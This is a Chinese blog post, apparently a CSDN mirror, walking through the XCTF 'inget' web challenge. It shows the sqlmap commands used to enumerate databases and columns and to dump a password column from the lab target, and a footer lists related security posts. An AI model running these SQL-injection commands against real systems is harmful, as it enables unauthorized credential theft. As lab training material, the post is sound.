首页 > 其他分享 >【攻防世界】WEB-inget

【攻防世界】WEB-inget

时间:2024-12-01 11:00:29浏览次数:9  
标签:sqlmap WEB http 攻防 -- 61.147 171.105 inget id

首先找到该关卡
image.png
启动靶场环境
image.png
访问靶场
image.png
构造一个id参数,尝试访问,无内容回显
image.png
使用sqlmap工具,先获取数据库,输入命令sqlmap -u http://61.147.171.105:58893/?id=1 --dbs
image.png
发现第一个即为所需数据库,接下来进行获取字段,输入命令sqlmap -u http://61.147.171.105:58893/?id=1 -D cyber --columns
image.png
发现pw字段应该存放的密码,使用命令sqlmap -u http://61.147.171.105:58893/?id=1 -D cyber -C pw --dump,获得到密码
image.png

标签:sqlmap,WEB,http,攻防,--,61.147,171.105,inget,id
From: https://blog.csdn.net/weixin_62512865/article/details/144166613

相关文章

  • weblogic
    1.weblogic未授权命令执行打开vulhub靶机,定位到weblogic未授权命令执行的目录下,然后使用docker-composeup-d命令启动docker查看靶机内网地址:192.168.187.130浏览器访问:192.168.187.130:7001/console1.2第二种方法利用未授权漏洞进行访问,访问以下URL,即可未授权......
  • ssm+vue726基于web的学生就业管理系统的设计与实现
    博主介绍:专注于Java(springbootssm等开发框架)vue .net phpphythonnode.js  uniapp微信小程序等诸多技术领域和毕业项目实战、企业信息化系统建设,从业十五余年开发设计教学工作☆☆☆精彩专栏推荐订阅☆☆☆☆☆不然下次找不到哟我的博客空间发布了1600+毕设......
  • Websocket++ 框架
    概述基于C++标准的WebSocket协议实现,适合使用C++11或更高版本开发的项目,支持构建WebSocket客户端和服务器,功能灵活,设计模块化,非常适合高性能的网络通信场景主要特点支持WebSocket客户端和服务器默认支持同步和异步I/O;可以与Boost.Asio或其他异步I/O库集成,......
  • #渗透测试#SRC漏洞挖掘#红蓝攻防#黑客工具之Burp Suite介绍02-如何破解(中英对比)
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。                             ......
  • 20222306 2024-2025-1《网络与系统攻防技术》实验七实验报告
    1.实验内容1.1实验目的及要求本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有(1)简单应用SET工具建立冒名网站(2)ettercapDNSspoof(3)结合应用两种技术,用DNSspoof引导特定访问到冒名网站。1.2本周学习内容本周学习内容主要是Web安全,了解......
  • 攻防世界misc部分
    [攻防世界]1-misc解题根据提示“生日”,猜测8位数暴力破解,大概试一下20000000开始,不然一个小时太久了得到口令20001228又是压缩包,注意CRC,与上图2.zip中相同,猜测明文破解[攻防世界]BotW-题目MASTERUSINGITANDYOUCANHAVETHIS.分析图片隐写解题某某装备吧,逐日之......
  • 《网络与系统攻防技术》实验七
    1.实验内容及要求本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有(1)简单应用SET工具建立冒名网站(2)ettercapDNSspoof(3)结合应用两种技术,用DNSspoof引导特定访问到冒名网站。二、实验过程(一)简单应用SET工具建立冒名网站使用set工具set......
  • 20222422 2024-2025-1 《网络与系统攻防技术》实验五实验报告
    一、实验内容(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:DNS注册人及联系方式该域名对应IP地址IP地址注册人及联系方式IP地址所在国家、城市和具体地理位置PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集......
  • 20222414 2024-2025-1 《网络与系统攻防技术》实验七实验报告
    1.实验内容及要求1.1本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有(1)简单应用SET工具建立冒名网站(2)ettercapDNSspoof(3)结合应用两种技术,用DNSspoof引导特定访问到冒名网站。1.2本周学习内容(1)web安全基础:学习了web前端和后端的概念......
  • 48. Web前端网页案例——【王者荣耀游戏主题网页( 6页)】 大学生期末大作业 html5+css3+
    目录一、网页概述二、网页文件 三、网页效果四、代码展示1.html2.CSS3.JS五、总结1.简洁实用2.使用方便3.整体性好4.形象突出5.交互式强六、更多推荐♬♬♬​​​​​​​欢迎光临我的CSDN!这里是Web前端网页案例大集汇,有各行各业的前端网页案例,每天会持续更......